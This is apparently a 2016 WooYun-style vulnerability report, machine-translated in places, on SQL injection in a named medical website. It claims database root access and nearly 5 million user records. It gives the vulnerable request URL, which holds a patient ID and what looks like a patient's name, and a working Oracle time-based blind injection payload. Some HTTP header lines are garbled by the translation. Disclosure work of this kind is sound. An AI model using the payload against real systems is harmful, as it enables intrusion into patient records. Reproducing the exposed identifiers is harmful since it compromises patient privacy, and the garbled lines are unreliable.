漏洞标题 智慧医疗安全之云信医疗主站SQL注入/DBA权限/涉及近500W+用户数据 相关厂商 jkwin.com.cn 漏洞作者 路人甲 提交时间 2016-06-06 20:13 公开时间 201…
从对等方接收数据时失败
Referer的:http://www.jkwin.com.cn/ystpatient2.3/callR.do?method=getQuery&true=doJsonp_f4bc5edb_8efe_4724_9b24_62ce7b52b552&patientId=5577546766&patientName=%E8%8B%8F%E8%81%94&functionName=doJsonp_f4bc5edb_8efe_4724_9b24_62ce7b52b552& _=1465190257502
主持人: www.jkwin.com.cn
连接:保持活动状态
Accept-Encoding: gzip,deflate
接受: */*
有效负载:(延迟3秒,请注意会话在验证时到期)
1'AND 2452=DBMS_PIPE.RECEIVE_MESSAGE(CHR(117)|| CHR(102)|| CHR(98)|| CHR(108),3)AND'UisK'='UisK
漏洞证明:
1,当前数据库用户,ROOT

2,所有数据库,共29个

3,与主站数据库相同,引用wooyun-2016-0214867的表数据来说明危险,涉及近500W +用户数据,具体不深

修理计划:
请多指教〜
版权声明:请注明出处。居民A @乌云